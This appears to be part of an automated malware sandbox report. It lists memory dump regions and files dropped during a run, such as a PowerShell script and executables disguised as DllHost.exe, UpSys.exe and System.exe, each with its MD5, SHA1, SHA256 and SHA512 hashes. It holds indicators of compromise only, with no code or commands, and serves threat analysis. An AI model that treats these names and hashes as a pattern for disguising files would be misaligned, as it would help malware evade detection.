memory/1172-130-0x0000000000000000-mapping.dmp

memory/1172-131-0x0000000002EA0000-0x0000000002ED6000-memory.dmp

memory/1172-132-0x00000000059C0000-0x0000000005FE8000-memory.dmp

memory/1172-133-0x00000000057F0000-0x0000000005812000-memory.dmp

memory/1172-134-0x00000000060F0000-0x0000000006156000-memory.dmp

memory/1172-135-0x00000000061D0000-0x0000000006236000-memory.dmp

memory/1172-136-0x00000000066F0000-0x000000000670E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\79571.ps1

MD5 d831df909c8d68d7ac710f09ea9a7294
SHA1 4cf51399d9895c799c297e5e3078fa25cf4940b5
SHA256 9771d530fb3067031df355268df854d6f162d97074ae8883ffb30b7350cf8f0c
SHA512 000959c53063ee99db5ec20448a23e6406720c611ed225b7f8ed92855c1c576b2127cb48c6508cb61a00c9ab96fc40bed81a94e5db5ff18db520aacf48ac0e77

memory/1172-138-0x0000000007F00000-0x000000000857A000-memory.dmp

memory/1172-139-0x0000000006C40000-0x0000000006C5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\79571.exe

MD5 cb9659a181ad8cc58023c5d8566b2d5a
SHA1 7b6c751aefca16847c2b1e57712342a7dffe585f
SHA256 d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2
SHA512 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

memory/2284-141-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\79571.exe

MD5 cb9659a181ad8cc58023c5d8566b2d5a
SHA1 7b6c751aefca16847c2b1e57712342a7dffe585f
SHA256 d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2
SHA512 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

memory/2748-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

MD5 77636b47fc9e1bc61a4a019371e09390
SHA1 615275ae7a28ee86cd9f4f586a3c7c5366490444
SHA256 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277
SHA512 ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

MD5 77636b47fc9e1bc61a4a019371e09390
SHA1 615275ae7a28ee86cd9f4f586a3c7c5366490444
SHA256 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277
SHA512 ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

memory/1444-146-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\DllHost.exe

MD5 6368031626da1f0d51bcac43104b123f
SHA1 5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

C:\Users\Admin\AppData\Local\Temp\DllHost.exe

MD5 6368031626da1f0d51bcac43104b123f
SHA1 5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

memory/33560-149-0x0000000000000000-mapping.dmp

memory/33560-150-0x000002B547FB0000-0x000002B547FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c15ac263e9da0baa9287d105570e6f1
SHA1 99aa6487b21dc6e1cd5f4a097313508df50f0829
SHA256 40dc53e1f4d85e4c22d6e35799dc25639d1da6e27805c34f6af092b68a8735c3
SHA512 2aeef83af972de648d126b8fc347e5142113a842a2280f97435e85c8c0c5700dcf390b2c5afa3f5b868a0c404fc2c47ae73178b666677529ae7b3c63c7f67cac

memory/33560-152-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

C:\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

memory/67976-154-0x0000000000000000-mapping.dmp

C:\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

memory/69608-156-0x0000000000000000-mapping.dmp

C:\ProgramData\Systemd\procexp.exe

MD5 2d9fb9ed8bebb55280b81a4652dcfa11
SHA1 76300e059e74d8cfc99a736917cd3a512dd32cab
SHA256 573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf
SHA512 ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c

memory/69608-158-0x000001BE3B1E0000-0x000001BE3B200000-memory.dmp

memory/85036-159-0x0000000000000000-mapping.dmp

memory/94360-160-0x0000000000000000-mapping.dmp

C:\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

memory/94992-162-0x0000000000000000-mapping.dmp

C:\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

memory/69608-164-0x000001BE3B230000-0x000001BE3B250000-memory.dmp

memory/94460-165-0x0000000000000000-mapping.dmp

C:\ProgramData\MicrosoftNetwork\System.exe

MD5 6368031626da1f0d51bcac43104b123f
SHA1 5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

memory/94460-167-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

memory/33560-168-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

memory/94460-169-0x00000191E7A80000-0x00000191E7AC4000-memory.dmp

memory/94460-170-0x00000191FFED0000-0x00000191FFF46000-memory.dmp

memory/94460-171-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

memory/69608-172-0x000001BE3CB30000-0x000001BE3CB50000-memory.dmp

memory/69608-174-0x000001BE3CB10000-0x000001BE3CB30000-memory.dmp

memory/33560-173-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

memory/69608-175-0x000001BE3CB30000-0x000001BE3CB50000-memory.dmp

memory/69608-176-0x000001BE3CB10000-0x000001BE3CB30000-memory.dmp